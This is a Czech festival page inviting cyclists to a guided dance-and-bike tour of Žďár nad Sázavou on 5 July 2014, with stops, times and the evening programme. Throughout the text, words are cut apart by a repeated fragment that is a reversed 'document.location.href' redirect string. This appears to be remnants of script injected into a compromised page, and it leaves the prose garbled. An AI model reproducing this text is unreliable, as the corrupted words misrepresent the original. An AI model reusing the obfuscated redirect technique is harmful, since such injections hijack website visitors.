Rainbow page separator

Pozvánka na Tančící kola – Festival KoresponDance 2014

Pátek, 27. června 2014

Žďár nad Sázavou/ Cyklisté a necyklisté, vezměte si 5. července svá kola a přidejte se k nám v 9h na Farských humnech na netradiční prohlídku Žďárem nad Sázavou. Podívejte se na své měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to z jiného úhlu pohledu! Nechte se provést umělci, kteří přijedou z různých koutů České republiky i ze světa. Potkáte tu dva mistry choreografie té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to cykloprojížďky, Dominiqua Boivina, který tu pro vás loni roztančil Něžný bagr, a také Pierra Nadauda.

Poetickou cykloprojížďku městem začneme v 9.00 na Farských humnech a v 11.15 dorazíme k Pilské nádrži, kterou pro vás měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to Žďár nad Sázavou v ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to den oficiálně otevře!
P.S. A jestli nemáte kola rádi, přijďte pěšky!

Čas a mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, kde vás překvapíme ojedinělou performancí:

  • 9.00 Farská humna
  • 9.35 Kulturní dům
  • 10.05 Garáže u fotbalového stadionu
  • 10.25 Fotbalový stadion
  • 11.15 Pilská nádrž

Festival KoresponDance bude pokračovat od 14h30 na zámku, kde na vás bude čekat mnoho představení, koncertů, animací, prohlídek a workshopů pro děti. Program festivalu nabídne mimo jiné premiéru nového představení Anny Polívkové a Halky Třešňákové či úspěšné představení na motivy krále Artuše italského choreografa Paca Dèciny. Festival poběží až do pozdních večerních hodin a zakončí jej ve 22.00 koncert na Zelené hoře.
Do areálu zámku se však můžete přijít občerstvit už od 12.00. Těšíme se na vás!
Více informací: www.se-s-ta.cz